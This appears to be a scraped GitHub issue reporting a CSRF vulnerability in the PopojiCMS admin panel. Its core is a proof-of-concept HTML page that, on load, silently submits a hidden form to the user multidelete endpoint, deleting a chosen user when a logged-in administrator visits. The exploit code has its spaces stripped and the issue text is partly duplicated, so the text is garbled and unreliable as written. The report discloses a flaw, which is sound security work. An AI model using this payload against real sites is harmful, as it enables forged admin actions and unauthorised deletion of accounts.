One: use CSRF vulnerability to delete user
Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified user.
Vulnerability url: http://127.0.0.1/popojicms/po-admin/admin.php?mod=user
Vulnerability POC:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>OWASP CRSFTester Demonstration</title></head><bodyonload="javascript:fireForms()"><scriptlanguage="JavaScript">varpauses=newArray("7","7","10");functionpausecomp(millis){vardate=newDate();varcurDate=null;do{curDate=newDate();}while(curDate-date<millis);}functionfireForms(){varcount=3;vari=0;for(i=0;i<count;i++){document.forms[i].submit();pausecomp(pauses[i]);}}</script><H2>OWASP CRSFTester Demonstration</H2><formmethod="POST" name="form0" action="http://127.0.0.1:80/popojicms/po-admin/route.php?mod=user&act=multidelete"><inputtype="hidden" name="totaldata" value="1"/>
<inputtype="hidden" name="table-user_length" value="10"/>
<inputtype="hidden" name="item[0][deldata]" value="5"/>
</form><formmethod="GET" name="form1" action="http://127.0.0.1:80/popojicms/po-admin/admin.php?mod=user"><inputtype="hidden" name="name" value="value"/>
</form></body></html>
The text was updated successfully, but these errors were encountered:
One: use CSRF vulnerability to delete user
Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified user.
Vulnerability url: http://127.0.0.1/popojicms/po-admin/admin.php?mod=user
Vulnerability POC:
The text was updated successfully, but these errors were encountered: